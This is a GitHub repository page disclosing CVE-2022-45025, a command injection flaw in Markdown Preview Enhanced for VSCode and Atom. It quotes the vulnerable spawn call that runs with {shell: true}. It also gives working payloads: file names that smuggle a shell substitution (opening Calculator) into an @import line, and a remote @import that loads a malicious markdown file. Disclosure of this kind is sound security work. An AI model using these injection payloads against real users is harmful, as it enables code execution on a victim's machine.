Skip to content
/ CVE-2022-45025 Public

[PoC] Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)

89 stars 20 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

yuriisanin/CVE-2022-45025

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

21 Commits
assets
assets
 
 
examples
examples
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2022-45025

Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)

Description

The Mume markdown tool library was vulnerable to command injection due to use of spawn command with {shell: true} option. This could allow an attacker to achieve arbitary code execution by tricking victim into opening specially crafted Markdown file using VSCode or Atom. The library powers Markdown Preview Enhanced plugin for both VSCode and Atom.

Vulnerable code snippet:

const task = spawn(
      "pdf2svg",
      [
        `"${pdfFilePath}"`,
        `"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
        "all",
      ],
      { shell: true },
    )

Proof of Concept

The following Markdown document allows an attacker to execute arbitary command:

@import "$(open -a Calculator > /dev/null | exit 0)hello.pdf"

The following comment will be recognised by MPE as valid "@import" command:

<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->

Alternatively, the payload could be executed from external source:

<!-- @import "https://raw.githubusercontent.com/yuriisanin/CVE-2022-45025/main/examples/malicious.md" -->

DEMO for both VSCode and Atom on YouTube.

vscode-rce-poc-gif

Support

You can follow me on Twitter, GitHub or YouTube.

About

[PoC] Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)

Topics

markdown exploit rce cve command-injection

Resources

Readme
Activity

Stars

89 stars

Watchers

1 watching

Forks

20 forks
Report repository